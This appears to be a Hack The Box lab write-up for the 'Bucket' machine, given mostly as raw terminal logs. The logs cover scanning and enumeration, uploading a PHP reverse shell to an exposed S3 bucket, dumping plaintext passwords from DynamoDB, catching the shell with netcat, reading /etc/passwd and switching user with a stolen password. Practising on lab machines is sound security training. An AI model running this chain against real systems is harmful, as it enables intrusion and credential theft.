bucket

Introduction:

Recon

eneloop@kinetic:…/hackthebox/bucket/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.bucket.txt 10.10.10.212 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 21:35 EST Nmap scan report for 10.10.10.212 Host is up (0.014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://bucket.htb/ No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/2%OT=22%CT=1%CU=42145%PV=Y%DS=2%DC=I%G=Y%TM=601A0BF6 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS( OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11 OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN( OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= OS:S)

Network Distance: 2 hops Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.22 seconds

Enumeration

Information gathered from view-source: (view-source:http://bucket.htb)

email : [email protected] New subdomain - s3.bucket.htb

sudo echo “10.10.10.212 bucket.htb bucket s3.bucket.htb” » /etc/hosts

=============================================================== eneloop@kinetic:…/hackthebox/bucket/data$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://s3.bucket.htb -x php,txt,cfg,conf

Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)

[+] Url: http://s3.bucket.htb [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt,cfg,conf [+] Timeout: 10s

2021/02/02 22:05:52 Starting gobuster

/health (Status: 200) /shell (Status: 200)

Exploitation

root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls 2021-02-03 20:12:05 adserver root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls s3://adserver PRE images/ 2021-02-03 20:12:05 5344 index.html root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images PRE images/ root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/ 2021-02-03 20:12:05 37840 bug.jpg 2021-02-03 20:12:05 51485 cloud.png 2021-02-03 20:12:05 16486 malware.png root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 cp /oscp/tools/reverse-shell/php/shell.php s3://adserver/images/shell.php upload: ../../../../../../../../tools/reverse-shell/php/shell.php to s3://adserver/images/shell.php root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/ 2021-02-03 20:14:04 37840 bug.jpg 2021-02-03 20:14:04 51485 cloud.png 2021-02-03 20:14:04 16486 malware.png 2021-02-03 20:15:52 3460 shell.php root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/ 2021-02-03 20:16:03 37840 bug.jpg 2021-02-03 20:16:03 51485 cloud.png 2021-02-03 20:16:03 16486 malware.png root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 cp /oscp/tools/reverse-shell/php/shell.php s3://adserver/images/shell.php upload: ../../../../../../../../tools/reverse-shell/php/shell.php to s3://adserver/images/shell.php root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/ 2021-02-03 20:16:03 37840 bug.jpg 2021-02-03 20:16:03 51485 cloud.png 2021-02-03 20:16:03 16486 malware.png 2021-02-03 20:16:54 3460 shell.php

root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb dynamodb list-tables TABLENAMES users

root@kinetic:…/bucket/data/payload# aws –endpoint-url http://s3.bucket.htb dynamodb scan –table-name users None 3 3 PASSWORD Management@#1@# USERNAME Mgmt PASSWORD Welcome123! USERNAME Cloudadm PASSWORD n2vM-<_K_Q:.Aa2 USERNAME Sysadm

eneloop@kinetic:…/tools/reverse-shell/php$ nc -lvnp 4455 listening on [any] 4455 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.212] 54698 Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 01:17:08 up 12 min, 0 users, load average: 0.03, 0.09, 0.10 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can’t access tty; job control turned off $ ls

$ whoami www-data $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin roy:x:1000:1000:,,,:/home/roy:/bin/bash $

$ su - roy Password: Management@#1@# su: Authentication failure $ su - roy Password: Welcome123! su: Authentication failure $ su - roy Password: n2vM-<_K_Q:.Aa2

ls project user.txt whoami roy

Post-exploit/PrivEsc

Notes: